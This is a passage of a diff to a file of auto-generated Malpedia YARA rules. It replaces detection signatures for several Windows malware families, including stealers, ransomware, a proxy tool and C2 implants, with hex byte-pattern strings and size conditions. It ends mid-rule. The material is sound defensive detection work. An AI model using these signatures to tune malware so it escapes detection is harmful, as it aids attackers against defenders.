3bfd 72c4 } + $sequence_13 = { 8d4508 50 0fb6440b34 50 } + $sequence_14 = { 89542414 8b12 85d2 7454 8d6af8 d1ed } + $sequence_15 = { 47 3b7820 72d1 5b 33c0 40 } + $sequence_16 = { ff5010 85c0 7407 33c0 e9???????? } + $sequence_17 = { 8a4173 a808 75f5 a804 7406 } + $sequence_18 = { ff15???????? 85c0 750a b8010000c0 } + $sequence_19 = { 41 02fd c6430503 eb21 41 0fb6c1 } + $sequence_20 = { 48 8bfa 48 8bf1 45 8d41ce e8???????? } + $sequence_21 = { 7407 41 2bcd 7515 eb0f 44 } + $sequence_22 = { 48 8d442458 48 8bf9 48 } + $sequence_23 = { 8bce 894348 48 8b15???????? } + $sequence_24 = { 7307 4c8b742420 eba1 488bb590020000 } + $sequence_25 = { 57 4883ec30 488bf2 488bd9 ff15???????? 4885c0 } + $sequence_26 = { 7409 8b4c2478 493b0e 741e 498b1f 4885db } + $sequence_27 = { 33d2 488bc8 ff15???????? 488bb590020000 4885f6 7414 ff15???????? } + $sequence_28 = { 33d2 488bce ff15???????? 8bd8 49891e 85c0 } + $sequence_29 = { 4533c0 c740c803000000 ba00000080 ff15???????? 488bf0 4883f8ff 7507 } + $sequence_30 = { 33ff 4d8bf0 482178d8 4c8bfa } + $sequence_31 = { 5d c3 488b0d???????? 488d050d1e0000 } condition: - 7 of them and filesize <1115136 + 7 of them and filesize <303104 } -rule MALPEDIA_Win_Htran_Auto : FILE +rule MALPEDIA_Win_Graftor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "640e7099-e79d-52c5-9d59-7736988066fb" + id = "7d45e232-2e70-5f76-b127-1013459f5457" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.htran_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graftor_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "572147b50538386d2f3141669299b284d93907b072e98ae962e15d37b04a8bad" + logic_hash = "2d0bf0ad42127878b7c1f7be3bcb33cc3ba27a99993b023e29cc91abed5bec59" score = 75 quality = 75 tags = "FILE" @@ -141884,32 +144717,32 @@ rule MALPEDIA_Win_Htran_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 8d8434f0a20000 55 50 53 } - $sequence_1 = { 8bc8 83e103 f3a4 8b4c2462 } - $sequence_2 = { 83c408 a1???????? 85c0 7405 } - $sequence_3 = { 50 51 ffd3 85c0 7d28 bf???????? 83c9ff } - $sequence_4 = { ffd5 8bf8 8b442440 50 ff15???????? 50 53 } - $sequence_5 = { 8b8424e0420100 33c9 894c2414 53 8b10 } - $sequence_6 = { 8816 46 eb0f 0fb6d2 f682c1c3400004 } - $sequence_7 = { 89442410 c705????????03000000 8b442410 8b0d???????? 49 743a } - $sequence_8 = { c20400 8b542404 8b0d???????? 3915???????? 56 b8???????? } - $sequence_9 = { 899424e8010000 89b424e8000000 899424e4000000 33c0 8d8c24e8000000 } + $sequence_0 = { 8d742434 c684245803000069 e8???????? 8b54241c 53 e8???????? 59 } + $sequence_1 = { 55 8bec 51 8365fc00 56 0528010000 } + $sequence_2 = { ff750c 8d7de0 ff7508 e8???????? 8b45e8 8945f0 8b45ec } + $sequence_3 = { 8d44247c 50 c684245c03000070 e8???????? 83c40c c684245003000071 8b4c241c } + $sequence_4 = { 6a00 eb8b 8b7d0c 8b0f 8b4514 394810 7641 } + $sequence_5 = { 55 8bec 83e4f8 6aff 687e634c00 64a100000000 } + $sequence_6 = { 8901 33c0 40 e9???????? 8365d800 c745dc34ad4800 a1???????? } + $sequence_7 = { ff75ec 8d45e0 53 50 8bc6 e8???????? 8b18 } + $sequence_8 = { eb05 a1???????? 8b4dfc 33cd e8???????? c9 c3 } + $sequence_9 = { 3bc3 0f8686010000 8b87d0000000 6a64 99 5e f7fe } condition: - 7 of them and filesize <114688 + 7 of them and filesize <294912 } -rule MALPEDIA_Win_Blackcat_Auto : FILE +rule MALPEDIA_Win_Nimplant_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "64552e7e-a42b-5e42-ac85-4cf9a6355d18" + id = "c6b47fc0-6c54-5733-accf-0312881d8593" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackcat_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimplant" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nimplant_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "2fe3958ae160b549a525be2a75569af9cb09940744adfe7a2969b920b4e1603b" + logic_hash = "1d2dbc7055590af657485c9c8d5afa6cd108c9897c8a3274dd24779cb78842a6" score = 75 quality = 75 tags = "FILE" @@ -141923,32 +144756,32 @@ rule MALPEDIA_Win_Blackcat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 894608 c7460400000000 b001 ebe8 89c2 } - $sequence_1 = { 7260 8b06 01d8 51 57 50 89cf } - $sequence_2 = { 8975dc 8955e0 eb07 31c0 b902000000 } - $sequence_3 = { b104 eb0f e8???????? 89c2 c1e018 31c9 } - $sequence_4 = { 7504 3c02 7351 88c4 8975cc } - $sequence_5 = { 81f9cf040000 0f8fe4000000 81f96b040000 0f84b4010000 81f976040000 } - $sequence_6 = { 83ec08 a1???????? c745f800000000 c745fc00000000 85c0 7408 8d4df8 } - $sequence_7 = { 8d45f8 50 e8???????? 8b45f8 8b55fc 83c408 } - $sequence_8 = { 895804 897008 eb0b 8b45e8 894708 } - $sequence_9 = { ff45e4 8a02 42 8955e8 } + $sequence_0 = { 4c89e9 0f11642440 e8???????? 803b00 0f8515ffffff 488b4c2468 4885c9 } + $sequence_1 = { 894c2430 4889ac24b0000000 e9???????? 4981ffff7f0000 4c89f2 488b4b08 490f4ed7 } + $sequence_2 = { 488d051e3a0800 48895110 48894120 48c741183a000000 48c7410800000000 48c7442420a1060000 e8???????? } + $sequence_3 = { e8???????? 488b442440 488b542448 44886c0208 4883c001 0f8093040000 488b542448 } + $sequence_4 = { e8???????? 4c8b442430 48ba0000000000000040 4889f1 4c01e9 0f80b1000000 4885c9 } + $sequence_5 = { f30f6f25???????? 4889ea 41b8a94d975e 4c89e9 4c899c2408010000 4c89942400010000 0f11a42410010000 } + $sequence_6 = { 488b9424f0000000 4889d1 4883e904 0f80de0f0000 4839ca 0f8e58100000 4885c9 } + $sequence_7 = { e8???????? 803b00 488b942488000000 488b842480000000 0f8599feffff 4c8b4e58 4c89f1 } + $sequence_8 = { 80f90b 0f873b1a0000 0fb6f2 83ee01 4863f6 4883c60c 48c1e604 } + $sequence_9 = { 4889eb 48897c2440 488b7c2438 4889c5 4c89ee 4c897c2460 } condition: - 7 of them and filesize <29981696 + 7 of them and filesize <1811456 } -rule MALPEDIA_Win_Tinymet_Auto : FILE +rule MALPEDIA_Win_Bleachgap_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a6e31398-6f4b-5407-9dd6-cb73f522ca46" + id = "1c7bcc3b-871c-5292-a898-130d22929e4c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinymet_auto.yar#L1-L104" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bleachgap" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bleachgap_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "08c0faf51104b44743d7b565703ff1ffe8a5a90a54db8ef44d5f821b9f74a23a" + logic_hash = "feb4beb187c6596a9fcad947329bf36b55b60b3bae8b02c6a93cdc46dd85c07a" score = 75 quality = 75 tags = "FILE" @@ -141962,69 +144795,77 @@ rule MALPEDIA_Win_Tinymet_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? e9???????? 8d45ec 6a10 50 } - $sequence_1 = { 8bf0 83feff 751b 68???????? e9???????? ff15???????? } - $sequence_2 = { 56 ff15???????? 8b4df8 03d9 85c0 75df 8bc7 } - $sequence_3 = { 6a00 ff35???????? ff35???????? e8???????? 83c40c a3???????? ffd0 } - $sequence_4 = { 8bec 81eca4010000 8d855cfeffff 53 } - $sequence_5 = { 6a3e 59 f7f1 8a821c104000 88041f 47 3bfe } - $sequence_6 = { 741d 48 7416 68???????? e8???????? } - $sequence_7 = { 56 57 6a5c ff30 e8???????? } + $sequence_0 = { 8bec ff750c e8???????? 8bc8 83f9ff 7506 32c0 } + $sequence_1 = { c645fc04 8b8d70fbffff 83f910 722f 8b955cfbffff 41 8bc2 } + $sequence_2 = { e9???????? ff7104 8d442414 6800010000 50 e8???????? 8d442410 } + $sequence_3 = { c68539ffffff7a c6853affffff5f c6853bffffff55 c6853cffffff41 c6853dffffff57 c6853effffff3c c6853fffffff41 } + $sequence_4 = { eb0d 8b450c 8945b8 c745b400000000 84c9 8d4dd4 0f44f2 } + $sequence_5 = { c6431000 894924 c645fc02 8d45e0 c645e801 0f57c0 660fd607 } + $sequence_6 = { 88442426 8b442410 0413 3457 88442427 8b442410 0414 } + $sequence_7 = { b801000000 d3e0 8502 0f8459ffffff 8b4614 8b5714 8b0e } + $sequence_8 = { ff750c 50 e8???????? 83c410 85c0 0f84d9010000 53 } + $sequence_9 = { 8a13 8bc1 8b4df0 43 41 894df4 3810 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <4538368 } -rule MALPEDIA_Win_Hermes_Ransom_Auto : FILE +rule MALPEDIA_Win_Citadel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "88136c82-87ab-5f89-8963-9afb9534a540" - date = "2021-10-07" - modified = "2021-10-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hermes_ransom_auto.yar#L1-L125" + id = "cf6cb189-c7d7-5571-b2ec-c3b6f165f615" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.citadel_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "2bb9637b7e3ee9fcdd4e957eade001e8c8132e1b7c987ea6727ab44eda025915" + logic_hash = "8e88ac7355b3e3defd358849e38b9e68e570cd840f3a9a1ae754cb483f4c91f5" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20211007" - malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535" - malpedia_version = "20211008" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 59 59 8945e0 837ddc00 7506 837de000 7405 } - $sequence_1 = { 8d45dc 50 ff75d8 8d8560ffffff 50 ff75e0 ff15???????? } - $sequence_2 = { 33c0 668945e2 33c0 8945e4 8945e8 837df020 } - $sequence_3 = { 6a00 8d85a4f9ffff 50 ff15???????? 5f 5e 8be5 } - $sequence_4 = { 0fb7844504f7ffff 83f83b 741f 8b45d8 8b4df0 668b8c4d04f7ffff } - $sequence_5 = { 8365c800 8365d000 c745b840420f00 8365e000 eb07 8b45e0 40 } - $sequence_6 = { 59 6bc900 668981e8c34000 6a02 } - $sequence_7 = { 59 59 6a0f 6a00 8d45bc 50 } - $sequence_8 = { 8365f000 8b45f0 8945f8 837df800 7456 } - $sequence_9 = { 83e002 7415 ff750c ff75fc e8???????? 59 } + $sequence_0 = { eb0e 6800800000 53 57 } + $sequence_1 = { 55 8bec ff7508 e8???????? e8???????? 5d } + $sequence_2 = { eb03 83c002 68???????? 50 ff15???????? } + $sequence_3 = { e8???????? e8???????? 5d ff25???????? 55 8bec ff7508 } + $sequence_4 = { 33c0 5f 5e c20400 55 8bec 8b4d0c } + $sequence_5 = { e8???????? 8d7c0201 8bc7 e8???????? } + $sequence_6 = { 50 e8???????? 6a44 5a 52 } + $sequence_7 = { 50 8d5dfc e8???????? 8b4dfc } + $sequence_8 = { 884601 33c0 6689460c ff4df8 } + $sequence_9 = { 8a5602 8b4e10 8a5e14 fec8 32d0 8ac2 3245fe } + $sequence_10 = { 8845fe c645ff00 763c 8a06 } + $sequence_11 = { 3aca 73fa 0fb6c9 8b04c8 ebae 32c0 5f } + $sequence_12 = { 33c0 6689460e 0fb74606 6685c0 7432 } + $sequence_13 = { 85c0 7409 3255fd 8a0f ffd0 8807 } + $sequence_14 = { 6685c0 7432 66ff460e 6639460e } + $sequence_15 = { 6639460c 7228 8b4610 8a4e05 8a5614 85c0 } condition: - 7 of them and filesize <7192576 + 7 of them and filesize <1236992 } -rule MALPEDIA_Win_Yahoyah_Auto : FILE +rule MALPEDIA_Win_Mbrlocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8071f7bc-1af0-58b6-8984-8add890e5a04" + id = "6a472526-8a03-5ccc-a5eb-10b46b34c6da" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yahoyah_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mbrlocker_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "5a0539481a7f5653801a561ffa29165f1f4bf92248a27b13820a8f2035c6eb1c" + logic_hash = "2abe677d378843746aa6479444a4219927906b009fff2766ade4f081783dbae6" score = 75 quality = 75 tags = "FILE" @@ -142038,37 +144879,32 @@ rule MALPEDIA_Win_Yahoyah_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 6a02 53 6af0 } - $sequence_1 = { 50 6800080000 ff15???????? ff15???????? } - $sequence_2 = { 53 53 56 53 ff15???????? 68d0070000 } - $sequence_3 = { 50 e8???????? 83c418 6a02 53 } - $sequence_4 = { ff15???????? 6a2e 68???????? e8???????? } - $sequence_5 = { e8???????? 59 53 53 6a03 0fb7c8 } - $sequence_6 = { 52 c1e808 23c1 50 68???????? } - $sequence_7 = { ff15???????? 85c0 7501 c3 56 } - $sequence_8 = { 23d1 52 8bd0 c1ea18 52 0fb6d0 } - $sequence_9 = { eb19 ff15???????? 0fb7c0 50 68???????? } - $sequence_10 = { 6a1a 50 e8???????? bf???????? } - $sequence_11 = { ff15???????? 6a3a 56 e8???????? 8bf0 83c410 } - $sequence_12 = { 90 33c9 33c0 648b3530000000 8b760c } - $sequence_13 = { 90 68add13441 ffb53ffbffff 6a00 e8???????? 898521f1ffff e8???????? } - $sequence_14 = { 90 90 90 90 90 68add13441 ffb53ffbffff } + $sequence_0 = { 50 8b35???????? 8b3d???????? 6a10 68???????? } + $sequence_1 = { 68fe000000 68???????? ffd7 83c408 } + $sequence_2 = { 68ac000000 68???????? e8???????? 68ac000000 68???????? ffd7 83c408 } + $sequence_3 = { c705????????ba514000 c705????????00020000 68fe000000 68???????? ffd6 83c408 68ff000000 } + $sequence_4 = { 68ac000000 68???????? e8???????? e8???????? } + $sequence_5 = { 68ff000000 68ac000000 68???????? e8???????? e8???????? 68ff000000 68ac000000 } + $sequence_6 = { ac 30c8 aa 4a 75f9 61 c9 } + $sequence_7 = { 68fe000000 68???????? e8???????? 68fe000000 } + $sequence_8 = { 68fe000000 68???????? e8???????? e8???????? 68ff000000 68fe000000 } + $sequence_9 = { 31c8 e8???????? 68ac000000 68???????? } condition: - 7 of them and filesize <483328 + 7 of them and filesize <43008 } -rule MALPEDIA_Win_Fickerstealer_Auto : FILE +rule MALPEDIA_Win_Graphican_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "45d62189-24df-5dae-af5a-78b51fda916c" + id = "a2f03fc9-ee25-5fcd-896d-9bb49120884f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fickerstealer_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphican_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "fe62eb4bdda7768c5d67489e8496ef31433ebe8da6a7c001c0177fb4671588ff" + logic_hash = "a4c9c330e82d4ca3a447533684cd37026bb60c45e700ff39380301b043754c33" score = 75 quality = 75 tags = "FILE" @@ -142082,32 +144918,32 @@ rule MALPEDIA_Win_Fickerstealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b55c8 897150 895154 8b75cc 8b55d0 897158 89515c } - $sequence_1 = { ba???????? 0f2840f0 0f2808 0f298424a0040000 0f294910 0f2901 6a00 } - $sequence_2 = { c1e104 85c0 f20f10840b90000000 f20f108c0b98000000 f20f118c2488000000 f20f11842480000000 f20f10442450 } - $sequence_3 = { c1ea04 85d2 0f44d1 0f44f0 89d1 c1e902 6afe } - $sequence_4 = { 8b3e e8???????? 84c0 7404 c6470401 8b06 8b08 } - $sequence_5 = { 89d3 8954241c 897c2420 c744241801000000 89f1 e8???????? 3c0f } - $sequence_6 = { f20f114d9c f20f115594 7514 31d2 8d4ddc 42 e8???????? } - $sequence_7 = { e9???????? 8d7c2448 89f9 e8???????? 833f01 0f85ed000000 } - $sequence_8 = { 56 53 57 ff750c 50 e8???????? 83c424 } - $sequence_9 = { 898d40feffff 89f9 8985d4feffff 8b8570ffffff 8985d8feffff 8b4588 8985dcfeffff } + $sequence_0 = { 8d5f07 83e3f8 03d3 3b10 7619 8b06 3bc3 } + $sequence_1 = { 3c65 7408 3c45 0f8570010000 47 807def00 897dc0 } + $sequence_2 = { 56 57 8bf1 8bfa 85db 7517 68a8010000 } + $sequence_3 = { 53 8bf0 6a00 56 e8???????? a1???????? } + $sequence_4 = { 8d0c89 8d4c48d0 8a07 42 3c30 7dd4 894de8 } + $sequence_5 = { 68???????? 68???????? e8???????? 83c40c 8b4ddc c7461810000000 894e1c } + $sequence_6 = { 8d85e8edffff 6a00 50 e8???????? 83c40c 68???????? } + $sequence_7 = { 68???????? 68???????? e8???????? 83c40c 8b5624 2b5620 } + $sequence_8 = { 8d8dc4efffff 51 50 ffd2 8bb5c4efffff 33ff } + $sequence_9 = { 8bd8 e8???????? 8d4311 83c404 } condition: - 7 of them and filesize <598016 + 7 of them and filesize <362496 } -rule MALPEDIA_Win_Onliner_Auto : FILE +rule MALPEDIA_Win_Sysget_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c0a25174-badc-5a1b-a67c-48cbb1aef2be" + id = "950c6328-1de5-5d85-b009-d36eceeda441" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.onliner_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sysget_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "6df36365f1b8dbe7cdb1d0b03d64f7da847c99d2518d7b5ebc1610f68ca3a069" + logic_hash = "98d11ad376be93c301b2c1f8309ca9e93b58254eeadefcb865a1a57e18934a28" score = 75 quality = 75 tags = "FILE" @@ -142121,34 +144957,34 @@ rule MALPEDIA_Win_Onliner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8274ffffff 6683ff04 0f8596000000 33ff 8d45e4 668b55ee c1e202 } - $sequence_1 = { 8d8db4feffff 8bd3 8bc6 8b38 ff570c 8b85b4feffff 5a } - $sequence_2 = { 85c0 7405 3b50fc 7205 e8???????? 42 8d4410ff } - $sequence_3 = { 50 6a00 8bc3 e8???????? 50 ff15???????? } - $sequence_4 = { 3b45e4 0f84ab000000 ff45e4 807dee00 742c 8b55e4 2bd0 } - $sequence_5 = { 3345fc 03c6 0345cc 05c8fbd3e7 ba14000000 e8???????? 03c7 } - $sequence_6 = { 8bda 8bf0 8bc3 ba02000000 e8???????? 8bc3 e8???????? } - $sequence_7 = { 33c0 8945ec 837df000 7426 83caff 8b45f8 } - $sequence_8 = { 3bc3 7c07 807c1eff20 74f4 57 b9ffffff7f 8bd3 } - $sequence_9 = { 8b45fc 8b88d0010000 ba02000000 8b45fc 8b18 ff534c ff75e4 } + $sequence_0 = { 56 6a20 8d45cc 50 53 53 } + $sequence_1 = { f3a5 33f6 8d4435f0 8a08 f6d1 80f15f } + $sequence_2 = { 58 6a00 ff15???????? 6a01 8d85ecf9ffff 50 8d85ecf1ffff } + $sequence_3 = { 8985c8f9ffff 83c032 50 66a5 e8???????? 83c428 } + $sequence_4 = { 33f6 8d4435f0 8a08 f6d1 80f15f 46 } + $sequence_5 = { 75f5 8dbdecfeffff 2bc2 83ef02 668b4f02 83c702 6685c9 } + $sequence_6 = { 83c424 6800010000 ffb5f8feffff c1e306 8d841dfcfeffff 50 ff15???????? } + $sequence_7 = { 6a50 68???????? 50 ff15???????? a3???????? a1???????? } + $sequence_8 = { 51 ff36 897d0c 50 53 } + $sequence_9 = { 8d459c 50 56 56 6a20 53 } condition: - 7 of them and filesize <1736704 + 7 of them and filesize <352256 } -rule MALPEDIA_Win_Lorenz_Auto : FILE +rule MALPEDIA_Win_Mechanical_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "10a95bcc-414b-5fdc-ba6f-70234a4a7232" + id = "2ebc8e2c-9656-5fd5-9240-713f089f8d21" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lorenz_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mechanical_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "b3150a02c51834520c50a8abe1ab216fe79abbf33e7abc68b4a01a1cc4acdf52" - score = 60 - quality = 45 + logic_hash = "0d673fb1f58f38008ae08ad0a2913e65568b1230b5de3947ba7af4a4e448c6f0" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -142160,34 +144996,40 @@ rule MALPEDIA_Win_Lorenz_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4de8 e8???????? 898568ffffff eb15 8b55fc 8b4258 8b4df4 } - $sequence_1 = { c6412901 837df800 7423 8b55fc c7420c00000000 8b45f8 8b08 } - $sequence_2 = { 8b8800080000 e8???????? 8945f0 8b4dfc 8b8900080000 e8???????? 8945e0 } - $sequence_3 = { 8b55fc 8b4214 8b08 83e901 8b55fc 8b4214 8908 } - $sequence_4 = { ff55e4 8b55f0 89828c000000 8b45f0 8b888c000000 51 8b4dec } - $sequence_5 = { 8b4dfc e8???????? 85c0 7426 68???????? 68???????? 6a00 } - $sequence_6 = { 8b4dfc e8???????? 8bc8 e8???????? 0fb6c8 85c9 7460 } - $sequence_7 = { 8b4df8 83e904 e8???????? 8bc8 e8???????? 0fb6c8 85c9 } - $sequence_8 = { 50 e8???????? 8945d8 837dd800 0f8445010000 8b4dd8 d1e1 } - $sequence_9 = { 8b4dec 8b11 895004 8b45ec 8945e8 8b4de8 51 } + $sequence_0 = { 03c7 3bca 72ed 5f } + $sequence_1 = { c6025e eb12 c6022f eb0d } + $sequence_2 = { 8b442430 488d8c2471110000 33d2 41b803010000 } + $sequence_3 = { 0401 3cbe 8844240b 76e2 } + $sequence_4 = { 03ce c6840c3801000000 8d8424a05c0000 33f6 } + $sequence_5 = { 033485c0e54200 c745e401000000 33db 395e08 } + $sequence_6 = { 488d15d9d20000 488bcb e8???????? 85c0 750a 4883c310 } + $sequence_7 = { 00686c 42 0023 d18a0688078a } + $sequence_8 = { 4488a424300d0000 488905???????? e8???????? 4c8d1d5cd40100 498bcc } + $sequence_9 = { eb62 c6023d eb5d c6025f eb58 c6023a } + $sequence_10 = { 03c1 1bc9 0bc1 59 e9???????? e8???????? ff742404 } + $sequence_11 = { 41c1c90d 8bca 4983c201 4403c8 493bc8 } + $sequence_12 = { 033485c0e54200 8b45e4 8b00 8906 } + $sequence_13 = { 030495c0e54200 eb05 b8???????? f6400420 } + $sequence_14 = { 33d2 41b803010000 4488a42470110000 488905???????? e8???????? } + $sequence_15 = { 3c58 7711 480fbec5 428a8c10507c0200 83e10f eb03 } condition: - 7 of them and filesize <2254848 + 7 of them and filesize <434176 } -rule MALPEDIA_Win_Anchor_Auto : FILE +rule MALPEDIA_Win_Alphanc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1c11ed2a-15a5-596e-9198-01902495df6c" + id = "3e24a753-bd90-55fc-a721-b43ae19ca82e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.anchor_auto.yar#L1-L193" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alphanc_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "886cb58595403596c3f5d2209b3ab4ffe1064302e9312c9e2ca7e76025f4d7c9" + logic_hash = "76f5a4c48b7d4b7a92e132b26eac0da2bf874f9a491b16e025e278e5810143fc" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -142199,82 +145041,75 @@ rule MALPEDIA_Win_Anchor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 740c 66c740016578 c6400365 eb0a } - $sequence_1 = { c6400365 eb0a 66c74001646c c640036c } - $sequence_2 = { 56 8d8dbcfeffff e8???????? 68???????? 8d8dbcfeffff } - $sequence_3 = { b101 e8???????? e8???????? 84c0 } - $sequence_4 = { 56 e8???????? 8b30 837e0c00 } - $sequence_5 = { 8b4638 5f 66894812 33c9 8b4638 } - $sequence_6 = { f2e965020000 e9???????? 53 56 57 } - $sequence_7 = { 0f90c1 f7d9 0bc8 51 e8???????? 8b0d???????? c1e102 } - $sequence_8 = { 0fb7c1 6641 66890d???????? 50 } - $sequence_9 = { 7509 33d2 33c9 e8???????? } - $sequence_10 = { 488d0d520b0400 e8???????? 488b8500010000 488b8d08010000 } - $sequence_11 = { 488d0d516d0200 e8???????? 488d8d680e0000 e8???????? } - $sequence_12 = { 488d0d50840200 e8???????? 488d0d48840200 e8???????? } - $sequence_13 = { 4903c7 c64405b079 4903c7 c64405b073 4903c7 c64405b074 4903c7 } - $sequence_14 = { 488d0d528a0300 e8???????? 488b8de0000000 e8???????? } - $sequence_15 = { 488b4318 66894802 8d4f6e 488b4318 66894804 } - $sequence_16 = { 488d0d52b90200 e8???????? e8???????? 48894508 } - $sequence_17 = { e8???????? 4c8d442468 48837d8010 4c0f43442468 } - $sequence_18 = { 488d0d50480300 e8???????? 90 488b8500010000 488da5e8000000 5f } - $sequence_19 = { 4889442428 488d85d0030000 4889442420 4c8d4c2448 } - $sequence_20 = { 488d0d52cd0300 e8???????? 90 488b8d00010000 } + $sequence_0 = { c3 8b4c2428 85c9 757d 8b4c242c 85c9 7543 } + $sequence_1 = { e8???????? 83c40c 89442410 85c0 0f84f6010000 8b4d14 8b5510 } + $sequence_2 = { eb0a 8b4554 c7400c01000000 8b442414 8b4d54 c74538f0000000 894550 } + $sequence_3 = { 03c1 8b4c2444 13d7 2bc1 8bce 1bd1 8b4c243c } + $sequence_4 = { 8d55f0 6a00 52 6a04 68???????? 57 ff15???????? } + $sequence_5 = { 8b4758 8b8840030000 83f90e 7533 c7805403000001000000 8b4f58 39a978010000 } + $sequence_6 = { 33c0 56 f3ab 8b4e58 8b442424 